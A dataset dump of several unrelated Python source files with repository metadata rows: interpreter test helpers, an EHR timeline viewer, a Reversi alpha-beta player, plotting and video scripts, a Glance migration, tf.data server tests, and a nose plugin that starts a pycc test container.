variables `env_vars` succeeds (rc == 0) and return a (return code, stdout,
stderr) tuple.
If the __cleanenv keyword is set, env_vars is used as a fresh environment.
Python is started in isolated mode (command line option -I),
except if the __isolated keyword is set to False.
"""
return _assert_python(True, *args, **env_vars)
def assert_python_failure(*args, **env_vars):
"""
Assert that running the interpreter with `args` and optional environment
variables `env_vars` fails (rc != 0) and return a (return code, stdout,
stderr) tuple.
See assert_python_ok() for more options.
"""
return _assert_python(False, *args, **env_vars)
def spawn_python(*args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kw):
"""Run a Python subprocess with the given arguments.
kw is extra keyword args to pass to subprocess.Popen. Returns a Popen
object.
"""
cmd_line = [sys.executable]
if not interpreter_requires_environment():
cmd_line.append('-E')
cmd_line.extend(args)
# Under Fedora (?), GNU readline can output junk on stderr when initialized,
# depending on the TERM setting. Setting TERM=vt100 is supposed to disable
# that. References:
# - http://reinout.vanrees.org/weblog/2009/08/14/readline-invisible-character-hack.html
# - http://stackoverflow.com/questions/15760712/python-readline-module-prints-escape-character-during-import
# - http://lists.gnu.org/archive/html/bug-readline/2007-08/msg00004.html
env = kw.setdefault('env', dict(os.environ))
env['TERM'] = 'vt100'
return subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=stdout, stderr=stderr,
**kw)
def kill_python(p):
"""Run the given Popen process until completion and return stdout."""
p.stdin.close()
data = p.stdout.read()
p.stdout.close()
# try to cleanup the child so we don't appear to leak when running
# with regrtest -R.
p.wait()
subprocess._cleanup()
return data
def make_script(script_dir, script_basename, source, omit_suffix=False):
script_filename = script_basename
if not omit_suffix:
script_filename += os.extsep + 'py'
script_name = os.path.join(script_dir, script_filename)
# The script should be encoded to UTF-8, the default string encoding
with open(script_name, 'w', encoding='utf-8') as script_file:
script_file.write(source)
importlib.invalidate_caches()
return script_name
def make_zip_script(zip_dir, zip_basename, script_name, name_in_zip=None):
zip_filename = zip_basename+os.extsep+'zip'
zip_name = os.path.join(zip_dir, zip_filename)
with zipfile.ZipFile(zip_name, 'w') as zip_file:
if name_in_zip is None:
parts = script_name.split(os.sep)
if len(parts) >= 2 and parts[-2] == '__pycache__':
legacy_pyc = make_legacy_pyc(source_from_cache(script_name))
name_in_zip = os.path.basename(legacy_pyc)
script_name = legacy_pyc
else:
name_in_zip = os.path.basename(script_name)
zip_file.write(script_name, name_in_zip)
#if test.support.verbose:
# with zipfile.ZipFile(zip_name, 'r') as zip_file:
# print 'Contents of %r:' % zip_name
# zip_file.printdir()
return zip_name, os.path.join(zip_name, name_in_zip)
def make_pkg(pkg_dir, init_source=''):
os.mkdir(pkg_dir)
make_script(pkg_dir, '__init__', init_source)
def make_zip_pkg(zip_dir, zip_basename, pkg_name, script_basename,
source, depth=1, compiled=False):
unlink = []
init_name = make_script(zip_dir, '__init__', '')
unlink.append(init_name)
init_basename = os.path.basename(init_name)
script_name = make_script(zip_dir, script_basename, source)
unlink.append(script_name)
if compiled:
init_name = py_compile.compile(init_name, doraise=True)
script_name = py_compile.compile(script_name, doraise=True)
unlink.extend((init_name, script_name))
pkg_names = [os.sep.join([pkg_name]*i) for i in range(1, depth+1)]
script_name_in_zip = os.path.join(pkg_names[-1], os.path.basename(script_name))
zip_filename = zip_basename+os.extsep+'zip'
zip_name = os.path.join(zip_dir, zip_filename)
with zipfile.ZipFile(zip_name, 'w') as zip_file:
for name in pkg_names:
init_name_in_zip = os.path.join(name, init_basename)
zip_file.write(init_name, init_name_in_zip)
zip_file.write(script_name, script_name_in_zip)
for name in unlink:
os.unlink(name)
#if test.support.verbose:
# with zipfile.ZipFile(zip_name, 'r') as zip_file:
# print 'Contents of %r:' % zip_name
# zip_file.printdir()
return zip_name, os.path.join(zip_name, script_name_in_zip)
| 40.253788 | 112 | 0.642138 |
ace084074f67a693d4f15d32de06f9b01be85697 | 96 | py | Python | venv/lib/python3.8/site-packages/rope/base/prefs.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/rope/base/prefs.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/rope/base/prefs.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/b2/d8/c1/6743c2ad1bdbba8b59270d7bebcac581445361c5e818e34f4972e93aae | 96 | 96 | 0.895833 |
ace0852691c45029d65a36086298c74cbe085f2e | 2,488 | py | Python | ehr_ml/timeline.py | desmarg/ehr_ml | 48a385fe2ebdbef655bd4c6b6dd9a73a4e3f76b4 | [
"MIT"
] | 1 | 2021-05-19T13:08:29.000Z | 2021-05-19T13:08:29.000Z | ehr_ml/timeline.py | desmarg/ehr_ml | 48a385fe2ebdbef655bd4c6b6dd9a73a4e3f76b4 | [
"MIT"
] | null | null | null | ehr_ml/timeline.py | desmarg/ehr_ml | 48a385fe2ebdbef655bd4c6b6dd9a73a4e3f76b4 | [
"MIT"
] | null | null | null | from __future__ import annotations
import argparse
import bisect
import os
from .extension.timeline import (
ObservationWithValue,
TimelineReader,
Patient,
PatientDay,
)
__all__ = ["ObservationWithValue", "TimelineReader", "Patient", "PatientDay"]
def inspect_timelines() -> None:
parser = argparse.ArgumentParser(
description="A tool for inspecting an ehr_ml extract"
)
parser.add_argument(
"extract_dir",
type=str,
help="Path of the folder to the ehr_ml extraction",
)
parser.add_argument(
"patient_id", type=int, help="The patient id to inspect",
)
args = parser.parse_args()
source_file = os.path.join(args.extract_dir, "extract.db")
timelines = TimelineReader(source_file)
if args.patient_id is not None:
patient_id = int(args.patient_id)
else:
patient_id = timelines.get_patient_ids()[0]
location = bisect.bisect_left(timelines.get_patient_ids(), patient_id)
original_patient_id = timelines.get_original_patient_ids()[location]
if timelines.get_patient_ids()[location] != patient_id:
print("Could not locate patient ?", patient_id)
exit(-1)
patient = timelines.get_patient(patient_id)
print(f"Patient: {patient.patient_id}, (aka {original_patient_id})")
def obs_with_value_to_str(obs_with_value: ObservationWithValue) -> str:
code_text = timelines.get_dictionary().get_word(obs_with_value.code)
if obs_with_value.is_text:
value_text = timelines.get_value_dictionary().get_word(
obs_with_value.text_value
)
return f'{code_text}-"{value_text}"'
else:
return f"{code_text}-{obs_with_value.numeric_value}"
for i, day in enumerate(patient.days):
print(f"----Day {i}----")
print(day.date)
print(day.age)
print(
"{"
+ ", ".join(
sorted(
[
str(timelines.get_dictionary().get_word(a))
for a in day.observations
]
)
)
+ "}"
)
print(
"{"
+ ", ".join(
sorted(
[
obs_with_value_to_str(a)
for a in day.observations_with_values
]
)
)
+ "}"
)
| 27.644444 | 77 | 0.564711 |
ace0868e43437288d5ff578a8b1bff48fdea75b2 | 5,707 | py | Python | AlphaBetaPlayer.py | sglyon/reversi.py | d66f37364e7b6cba1f6c1c08401b6ca9373ecc42 | [
"MIT"
] | null | null | null | AlphaBetaPlayer.py | sglyon/reversi.py | d66f37364e7b6cba1f6c1c08401b6ca9373ecc42 | [
"MIT"
] | null | null | null | AlphaBetaPlayer.py | sglyon/reversi.py | d66f37364e7b6cba1f6c1c08401b6ca9373ecc42 | [
"MIT"
] | 1 | 2020-01-01T00:12:04.000Z | 2020-01-01T00:12:04.000Z | from Player import Player
import sys
import time
import random
from pprint import pprint
from board import Board
INF = 1.0e100
CORNERS = [(0, 0), (0, 7), (7, 0), (7, 7)]
CENTERS = [(3, 3), (3, 4), (4, 3), (4, 4)]
DANGERS = [(0, 1), (0, 6), (1, 0), (1, 1), (1, 6), (1, 7), (6, 0), (6, 1),
(6, 6), (6, 7), (7, 1), (7, 6)]
G_EDGES = [(0, 2), (0, 3), (0, 4), (0, 5), (2, 0), (3, 0), (4, 0), (5, 0),
(2, 7), (3, 7), (4, 7), (5, 7), (7, 2), (7, 3), (7, 4), (7, 5)]
NEIGHBORS = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0),
(1, 1)]
def print_futures(futures):
for value_move in futures:
print(value_move[1], ": ", value_move[0])
if sys.version_info.major == 2:
range = xrange
def iteritems_dict(x):
return x.iteritems()
else:
def iteritems_dict(x):
return x.items()
def get_value(future):
return future[0]
def printState(s):
# INVERTS TO MATCH VISUAL
pprint(s[::-1])
def compare(a, b):
return (a > b) - (a < b)
class AlphaBetaPlayer(Player):
def __init__(self, me, you, fprune=0.1, margin=0.0):
super(AlphaBetaPlayer, self).__init__(me, you)
# algorithm params
self.margin = margin # for more aggressive pruning
self.fprune = fprune # for unlikely random pruning
self.overall_weight = 1.0
self.corner_weight = 4.0
self.g_weight = 2.0
self.danger_weight = 2.0
self.center_weight = 1.0
self.move_weight = 1.1
self.connected_weight = 1.5
self.mobility_weight = 2.0
self.frontiers_weight = 5.0
self.modify_weights_at_round = 30
self.seconds_cutoff = 9
self.max_depth = 4
self.t1, self.t2 = 0.0, 0.0
self.round = -1
self.timeLimit = time.time()
def move(self, state):
moves = self.get_valid_moves(state)
self.time_limit = time.time() + self.seconds_cutoff
if self.round < 4:
return random.choice(moves)
if self.round > self.modify_weights_at_round:
self.overall_weight = 2.0
self.mobility_weight = 1.0
self.max_depth = 5
return self.alpha_beta(moves)
def alpha_beta(self, moves):
def future(move):
space = self.board.spaces[move]
next_s = self.board.next_state_bits(space, self.mine, self.foe)
return self.min_val(next_s, -INF, INF, depth=0)
futures = [(future(move), move) for move in moves]
print_futures(futures)
best_value_move = max(futures, key=get_value)
print("Best: ", best_value_move[1], ": ", best_value_move[0])
return best_value_move[1]
def stop(self, depth):
if depth > self.max_depth:
return True
elif time.time() > self.time_limit:
print("-" * depth, "Timeout")
return True
else:
return False
def min_val(self, s, alpha, beta, depth):
if self.stop(depth):
return self.evaluate(s, self.me)
val = INF
moves = self.get_valid_moves(s, self.you)
for idx, move in enumerate(moves):
# next_state_bits(self, space, mover, opponent):
space = self.board.spaces[move]
next_s = self.board.next_state_bits(space, s[1], s[0])
val = min(val, self.max_val(next_s, alpha, beta, depth+1))
if val - self.margin <= alpha: # or fprune > random():
return val
beta = min(beta, val)
return val
def max_val(self, s, alpha, beta, depth):
if self.stop(depth):
return self.evaluate(s, self.me)
val = -INF
moves = self.get_valid_moves(s, self.me)
for idx, move in enumerate(moves):
space = self.board.spaces[move]
next_s = self.board.next_state_bits(space, s[0], s[1])
val = max(val, self.min_val(next_s, alpha, beta, depth+1))
if val + self.margin >= beta:
return val
alpha = max(alpha, val)
return val
def enemy_index(self, player):
return (player == 1) + 1
def evaluate(self, s, player):
enemy = self.enemy_index(player)
# how many moves do I have vs how many moves they have
player_moves = self.get_valid_moves(s, player)
enemy_moves = self.get_valid_moves(s, enemy)
mobility = len(player_moves)
frontiers = len(enemy_moves)
# overall = compare(score(s, player), score(s, enemy))
my_score = self.board.score(s[0])
foe_score = self.board.score(s[1])
overall = (my_score - foe_score) / (my_score + foe_score)
corners_bits = sum(self.board.spaces[i] for i in CORNERS)
corners = (self.board.score(corners_bits & s[0]) -
self.board.score(corners_bits & s[1]))
# edges_bits = sum(self.board.spaces[i] for i in G_EDGES)
# edges = (self.board.score(edges_bits & s[0]) -
# self.board.score(edges_bits & s[1]))
dangers_bits = sum(self.board.spaces[i] for i in DANGERS)
dangers = (self.board.score(dangers_bits & s[0]) -
self.board.score(dangers_bits & s[1]))
# centers_bits = sum(self.board.spaces[i] for i in CENTERS)
# centers = (self.board.score(centers_bits & s[0]) -
# self.board.score(centers_bits & s[1]))
return (self.overall_weight * overall +
self.corner_weight * corners +
self.danger_weight * dangers +
self.mobility_weight * mobility -
self.frontiers_weight * frontiers)
| 30.682796 | 75 | 0.557736 |
ace087f37fe526c4ab33191a7e02dc4b3467409d | 1,653 | py | Python | python/lib/charting.py | aiver-workshop/intro-algo | f45f9f7873d94b76ff4edb3663c16ce45253922c | [
"MIT"
] | null | null | null | python/lib/charting.py | aiver-workshop/intro-algo | f45f9f7873d94b76ff4edb3663c16ce45253922c | [
"MIT"
] | null | null | null | python/lib/charting.py | aiver-workshop/intro-algo | f45f9f7873d94b76ff4edb3663c16ce45253922c | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from numpy import ndarray
import numpy as np
# use ggplot style for more sophisticated visuals
plt.style.use('ggplot')
def live_plotter(x_vec: ndarray, y1_data: ndarray, line1, title='', pause_time=0.01):
""" Reference: https://makersportal.com/blog/2018/8/14/real-time-graphing-in-python """
if not line1:
# this is the call to matplotlib that allows dynamic plotting
plt.ion()
fig = plt.figure(figsize=(13, 6))
ax = fig.add_subplot(111)
# create a variable for the line so we can later update it
line1, = ax.plot(x_vec, y1_data, '-o', alpha=0.8)
# update plot label/title
plt.ylabel('Y Label')
plt.title('Title: {}'.format(title))
plt.show()
# after the figure, axis, and line are created, we only need to update the y-data
line1.set_ydata(y1_data)
# adjust limits if new data goes beyond bounds
if np.min(y1_data) <= line1.axes.get_ylim()[0] or np.max(y1_data) >= line1.axes.get_ylim()[1]:
plt.ylim([np.min(y1_data) - np.std(y1_data), np.max(y1_data) + np.std(y1_data)])
# this pauses the data so the figure/axis can catch up - the amount of pause can be altered above
plt.pause(pause_time)
# return line so we can update it again in the next iteration
return line1
if __name__ == '__main__':
size = 100
x_vec = np.linspace(0, 1, size + 1)[0:-1]
y_vec = np.random.randn(len(x_vec))
line1 = []
while True:
rand_val = np.random.randn(1)
y_vec[-1] = rand_val
line1 = live_plotter(x_vec, y_vec, line1)
y_vec = np.append(y_vec[1:], 0.0) | 37.568182 | 101 | 0.645493 |
ace0897966007e4fa0e597f712bb47f45fd1b3b8 | 2,163 | py | Python | opencv/play_video.py | CospanDesign/python | 9f911509aae7abd9237c14a4635294c7719c9129 | [
"MIT"
] | 5 | 2015-12-12T20:16:45.000Z | 2020-02-21T19:50:31.000Z | opencv/play_video.py | CospanDesign/python | 9f911509aae7abd9237c14a4635294c7719c9129 | [
"MIT"
] | null | null | null | opencv/play_video.py | CospanDesign/python | 9f911509aae7abd9237c14a4635294c7719c9129 | [
"MIT"
] | 2 | 2020-06-01T06:27:06.000Z | 2022-03-10T13:21:03.000Z | #! /usr/bin/env python
# Copyright (c) 2017 Dave McCoy (dave.mccoy@cospandesign.com)
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
import cv2
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
DEFAULT_PATH="/home/cospan/sandbox/output.mp4"
def play_video(path):
cap = cv2.VideoCapture(path)
while (True):
ret, frame = cap.read()
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("-p", "--path",
nargs=1,
default=[DEFAULT_PATH])
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print "Running Script: %s" % NAME
path = args.path[0]
if args.debug:
print "path: %s" % path
play_video(path)
if __name__ == "__main__":
main(sys.argv)
| 25.151163 | 85 | 0.617661 |
ace08a5ad0b53fe250cf5e5b89607ce79ea63f6a | 1,236 | py | Python | glance/db/sqlalchemy/migrate_repo/versions/020_drop_images_table_location.py | cloudbau/glance | 616b097c052f5bf59b05326ed1d2d1ae1c703dc9 | [
"Apache-2.0"
] | 1 | 2018-05-03T03:52:39.000Z | 2018-05-03T03:52:39.000Z | glance/db/sqlalchemy/migrate_repo/versions/020_drop_images_table_location.py | cloudbau/glance | 616b097c052f5bf59b05326ed1d2d1ae1c703dc9 | [
"Apache-2.0"
] | null | null | null | glance/db/sqlalchemy/migrate_repo/versions/020_drop_images_table_location.py | cloudbau/glance | 616b097c052f5bf59b05326ed1d2d1ae1c703dc9 | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy
from glance.db.sqlalchemy.migrate_repo import schema
def get_images_table(meta):
return sqlalchemy.Table('images', meta, autoload=True)
def upgrade(migrate_engine):
meta = sqlalchemy.schema.MetaData(migrate_engine)
images_table = get_images_table(meta)
images_table.columns['location'].drop()
def downgrade(migrate_engine):
meta = sqlalchemy.schema.MetaData(migrate_engine)
images_table = get_images_table(meta)
location = sqlalchemy.Column('location', schema.Text())
location.create(images_table)
| 32.526316 | 78 | 0.747573 |
ace08a9c7371c5623eaf2aab3e04ba3fe7707470 | 758 | py | Python | tests/test_slice_render.py | yk-szk/volume-renderer | 68b2a0a57cb5530164062ecbe21fe9c33fcf286c | [
"MIT"
] | 37 | 2020-02-09T12:42:02.000Z | 2022-02-03T02:34:13.000Z | tests/test_slice_render.py | yk-szk/volume-renderer | 68b2a0a57cb5530164062ecbe21fe9c33fcf286c | [
"MIT"
] | null | null | null | tests/test_slice_render.py | yk-szk/volume-renderer | 68b2a0a57cb5530164062ecbe21fe9c33fcf286c | [
"MIT"
] | 9 | 2020-05-22T08:27:49.000Z | 2022-02-03T02:33:56.000Z | from pyvr.renderer import Renderer
from pyvr.actors import VolumeActor
from pyvr.actors import SliceActor
from pyvr.data.volume import load_volume
from pyvr.utils.video import write_video
if __name__ == '__main__':
volume_file = 'original-image.mhd'
volume = load_volume(volume_file)
clim = (-150, 350)
renderer = Renderer()
renderer.set_camera(pos=(0,-1200,0))
renderer.add_actor(VolumeActor(volume, 'bone'))
renderer.add_actor(SliceActor(volume, normal=(1,0,0), clim=clim))
renderer.add_actor(SliceActor(volume, normal=(0,1,0), clim=clim))
renderer.add_actor(SliceActor(volume, normal=(0,0,1), clim=clim))
proj = renderer.render(rotate_angles=list(range(0,360,1)), bg=(1,1,1))
write_video(proj, 'test.mp4')
| 32.956522 | 74 | 0.721636 |
ace08bb629f86922bca12abd1bdb37ae2046ee61 | 6,570 | py | Python | tensorflow/python/data/experimental/service/server_lib_test.py | vixadd/tensorflow | 8c624204eb686a91779149dc500e6c8c60096074 | [
"Apache-2.0"
] | 3 | 2019-11-19T14:07:27.000Z | 2020-10-04T12:57:40.000Z | tensorflow/python/data/experimental/service/server_lib_test.py | vixadd/tensorflow | 8c624204eb686a91779149dc500e6c8c60096074 | [
"Apache-2.0"
] | 4 | 2020-04-09T16:22:20.000Z | 2021-12-15T13:57:36.000Z | tensorflow/python/data/experimental/service/server_lib_test.py | vixadd/tensorflow | 8c624204eb686a91779149dc500e6c8c60096074 | [
"Apache-2.0"
] | 4 | 2022-01-13T11:23:44.000Z | 2022-03-02T11:11:42.000Z | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service server lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import tempfile
import threading
import unittest
from tensorflow.python.data.experimental.service import server_lib
from tensorflow.python.framework import errors
from tensorflow.python.platform import test
from tensorflow.python.profiler import profiler_client
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error: # pylint: disable=invalid-name
_portpicker_import_error = _error
portpicker = None
ASSIGNED_PORTS = set()
lock = threading.Lock()
def pick_unused_port():
"""Returns an unused and unassigned local port."""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
global ASSIGNED_PORTS
with lock:
while True:
try:
port = portpicker.pick_unused_port()
except portpicker.NoFreePortFoundError:
raise unittest.SkipTest("Flakes in portpicker library do not represent "
"TensorFlow errors.")
if port > 10000 and port not in ASSIGNED_PORTS:
ASSIGNED_PORTS.add(port)
logging.info("Using local port %r", port)
return port
class ServerLibTest(test.TestCase):
def testStartDispatcher(self):
dispatcher = server_lib.DispatchServer(start=False)
dispatcher.start()
def testStartDispatcherWithPortConfig(self):
port = pick_unused_port()
config = server_lib.DispatcherConfig(port=port)
dispatcher = server_lib.DispatchServer(config=config, start=True)
self.assertEqual(dispatcher.target, "grpc://localhost:{}".format(port))
def testStartDispatcherWithWorkDirConfig(self):
temp_dir = tempfile.mkdtemp()
config = server_lib.DispatcherConfig(work_dir=temp_dir)
dispatcher = server_lib.DispatchServer( # pylint: disable=unused-variable
config=config, start=True)
def testStartDispatcherWithFaultTolerantConfig(self):
temp_dir = tempfile.mkdtemp()
config = server_lib.DispatcherConfig(
work_dir=temp_dir, fault_tolerant_mode=True)
dispatcher = server_lib.DispatchServer( # pylint: disable=unused-variable
config=config, start=True)
def testStartDispatcherWithWrongFaultTolerantConfig(self):
config = server_lib.DispatcherConfig(fault_tolerant_mode=True)
error = "Cannot enable fault tolerant mode without configuring a work dir"
with self.assertRaisesRegex(ValueError, error):
dispatcher = server_lib.DispatchServer( # pylint: disable=unused-variable
config=config, start=True)
def testMultipleStartDispatcher(self):
dispatcher = server_lib.DispatchServer(start=True)
dispatcher.start()
def testStartWorker(self):
dispatcher = server_lib.DispatchServer()
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(dispatcher._address), start=False)
worker.start()
def testStartWorkerWithPortConfig(self):
dispatcher = server_lib.DispatchServer()
port = pick_unused_port()
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(dispatcher._address, port=port), start=True)
self.assertEqual(worker._address, "localhost:{}".format(port))
def testMultipleStartWorker(self):
dispatcher = server_lib.DispatchServer()
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(dispatcher._address), start=True)
worker.start()
def testStopDispatcher(self):
dispatcher = server_lib.DispatchServer()
dispatcher._stop()
dispatcher._stop()
def testStopWorker(self):
dispatcher = server_lib.DispatchServer()
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(dispatcher._address))
worker._stop()
worker._stop()
def testStopStartDispatcher(self):
dispatcher = server_lib.DispatchServer()
dispatcher._stop()
with self.assertRaisesRegex(
RuntimeError, "Server cannot be started after it has been stopped"):
dispatcher.start()
def testStopStartWorker(self):
dispatcher = server_lib.DispatchServer()
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(dispatcher._address))
worker._stop()
with self.assertRaisesRegex(
RuntimeError, "Server cannot be started after it has been stopped"):
worker.start()
def testJoinDispatcher(self):
dispatcher = server_lib.DispatchServer()
dispatcher._stop()
dispatcher.join()
def testJoinWorker(self):
dispatcher = server_lib.DispatchServer()
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(dispatcher._address))
worker._stop()
worker.join()
def testDispatcherNumWorkers(self):
dispatcher = server_lib.DispatchServer()
self.assertEqual(0, dispatcher._num_workers())
worker1 = server_lib.WorkerServer( # pylint: disable=unused-variable
server_lib.WorkerConfig(dispatcher._address))
self.assertEqual(1, dispatcher._num_workers())
worker2 = server_lib.WorkerServer( # pylint: disable=unused-variable
server_lib.WorkerConfig(dispatcher._address))
self.assertEqual(2, dispatcher._num_workers())
def testProfileWorker(self):
dispatcher = server_lib.DispatchServer()
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(dispatcher._address))
# Test the profilers are successfully started and connected to profiler
# service on the worker. Since there is no op running, it is expected to
# return UnavailableError with no trace events collected string.
with self.assertRaises(errors.UnavailableError) as error:
profiler_client.trace(worker._address, tempfile.mkdtemp(), duration_ms=10)
self.assertStartsWith(str(error.exception), "No trace event was collected")
if __name__ == "__main__":
test.main()
| 36.5 | 80 | 0.736073 |
ace08c8c74a58acc60920a499b2f8f600a63ebe4 | 8,430 | py | Python | pyon/util/pycc_plugin.py | ooici/pyon | 122c629290d27f32f2f41dafd5c12469295e8acf | [
"BSD-2-Clause"
] | 2 | 2015-06-09T16:07:09.000Z | 2015-07-28T10:06:31.000Z | pyon/util/pycc_plugin.py | ooici/pyon | 122c629290d27f32f2f41dafd5c12469295e8acf | [
"BSD-2-Clause"
] | 3 | 2020-07-22T15:14:55.000Z | 2021-12-13T19:35:06.000Z | pyon/util/pycc_plugin.py | ooici/pyon | 122c629290d27f32f2f41dafd5c12469295e8acf | [
"BSD-2-Clause"
] | null | null | null | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Usage: From project root dir:
# bin/nosetests --with-pycc [your other options]
#
# If you want to use this plugin AND insulate plugin:
# bin/nosetests --with-insulate --insulate-in-slave=--with-pycc --insulate-show-slave-output [your other options]
#
# Read up on insulate: http://code.google.com/p/insulatenoseplugin/
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import time, os
import subprocess
import signal
import sys
from nose.plugins import Plugin
from putil.rabbithelper import clean_by_sysname
debug = sys.stderr
class PYCC(Plugin):
name = 'pycc'
def __init__(self):
Plugin.__init__(self)
self.ccs = []
self.container_started = False
self.blames = {'state': [], 'events': [], 'resources': [], 'objects': []}
self.last_blame = {}
self.sysname = None
self.enablegb = False
def options(self, parser, env):
"""Register command line options"""
super(PYCC, self).options(parser, env=env)
parser.add_option('--pycc-rel', type='string', dest='pycc_rel',
help='Rel file path, res/deploy/r2deploy.yml by default',
default='res/deploy/r2deploy.yml')
parser.add_option('--pycc-enablegb', action='store_true', dest='enablegb',
default='False', help='Enable gevent block monitor')
def configure(self, options, conf):
"""Configure the plugin and system, based on selected options."""
super(PYCC, self).configure(options, conf)
if self.enabled:
self.rel = options.pycc_rel
self.enablegb = options.enablegb
def begin(self):
"""Called before any tests are collected or run. Use this to
perform any setup needed before testing begins.
"""
# Make sure we initialize pyon before anything in this plugin executes
from pyon.core import bootstrap
if not bootstrap.pyon_initialized:
bootstrap.bootstrap_pyon()
try:
from pyon.public import get_sys_name, CFG
self.sysname = get_sys_name()
# Clean exchanges and system queues out there
try:
connect_str = '-H %s -P 55672 -u %s -p %s -V %s' % (CFG.server.amqp.host,
CFG.server.amqp.username,
CFG.server.amqp.password,
CFG.server.amqp.vhost)
deleted_exchanges, deleted_queues = clean_by_sysname(connect_str, self.sysname)
debug.write('Deleted exchanges:\n%s \n' % '\n'.join(deleted_exchanges))
debug.write('Deleted queues:\n%s \n' % '\n'.join(deleted_queues))
except Exception as e:
pass
# Force datastore loader to use the same sysname
from pyon.datastore.datastore_admin import DatastoreAdmin
from pyon.datastore.datastore_common import DatastoreFactory
self.datastore_admin = DatastoreAdmin(config=CFG)
# Clean datastore and file system before pycc container starts
from pyon.util.int_test import IonIntegrationTestCase
IonIntegrationTestCase._force_clean(False)
def die(signum, frame):
# For whatever reason, the parent doesn't die some times
# when getting KeyboardInterrupt. Hence this signal
# handler.
# Signal is pass through. The child pycc gets
# its own KeyboardInterrupt and will shut down accordingly.
debug.write('Received Keyboard Interrupt. Exiting now.\n')
os._exit(9)
signal.signal(signal.SIGINT, die)
def no_zombie(signum, frame):
# Debug to figure out who's dying
debug.write('SIGCHLD received\n')
stack = []
while frame:
stack.append(frame)
frame =frame.f_back
stack.reverse()
for frame in stack:
debug.write('Frame %s in %s at line %s\n' %
(frame.f_code.co_name,
frame.f_code.co_filename, frame.f_lineno))
debug.write('Child is dead...Clean up now so there is no zombie\n')
(pid, status) = os.wait()
exitstatus, signum = status & 0xff, (status & 0xff00) >> 8
debug.write('Child pid %d with exit status %d and signum %d\n' % (pid, exitstatus, signum))
# Could be dangerous. Comment this out.
# signal.signal(signal.SIGCHLD, no_zombie)
def container_started_cb(signum, frame):
"""Callback when child pycc service is ready"""
self.container_started = True
signal.signal(signal.SIGUSR1, container_started_cb)
# Make sure the pycc process has the same sysname as the nose
ccargs = ['bin/pycc', '-o', '--noshell', '-sp', '--sysname=%s' % self.sysname,
'--logcfg=res/config/logging.pycc.yml',
'--rel=%s' % self.rel,
"--config={'system': {'auto_bootstrap': True}}"]
if self.enablegb:
ccargs.insert(1, '-egb')
debug.write('Starting pycc process: %s\n' % ' '.join(ccargs))
# Set PYCC env var in case CEI needs to skip tests in pycc mode
os.environ['PYCC_MODE'] = '1'
# Enable CEI mode for the tests
os.environ['CEI_LAUNCH_TEST'] = '1'
newenv = os.environ.copy()
po = subprocess.Popen(ccargs, env=newenv, close_fds=True)
self.ccs.append(po)
# Wait for container to be ready
while not self.container_started:
time.sleep(0.2)
debug.write('Child container is ready...\n')
# Dump datastore
self.datastore_admin.dump_datastore(path='res/dd')
debug.write('Dump child container state to file...\n')
# Clean again to make sure the first nosetest starts on a clean
# slate
